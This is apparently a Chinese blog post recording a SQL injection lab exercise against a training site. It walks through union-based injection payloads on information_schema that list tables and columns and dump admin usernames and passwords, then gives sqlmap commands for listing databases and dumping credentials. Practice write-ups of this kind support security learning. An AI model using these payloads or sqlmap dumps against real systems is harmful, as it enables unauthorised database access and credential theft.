SQL注入案例

代码熬夜敲Q2023-09-07 20:34

目录

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值，联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附：SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码

一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值，联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注：用 --+ 对结尾进行注释

附：SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

上一篇：动态内存申请

下一篇：Mysql存储过程与存储函数

热门推荐

012026年4月技术前沿：AI大模型爆发、智能体革命与量子安全新纪元 02GitHub 镜像站点 032026 年 AI 编程助手全面对比评测：Cursor vs Copilot vs Claude Code vs GitHub Copilot Free 04Claude Code Windows 兼容性问题：指定版本 2.1.112 可解决 05UBUNTU Claude Code 报错 claude native binary not installed 06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析 07从限购到畅通：GLM-5.1 Coding Plan接入攻略 08从零部署 Hermes Agent：一只"会成长的 AI 马"保姆级安装教程 09GPT-6发布日深度解析-Symphony架构200万Token实战 10零成本！Ollama本地部署国产大模型全指南（支持Kimi-K2.5/GLM-5/Qwen，新手秒上手）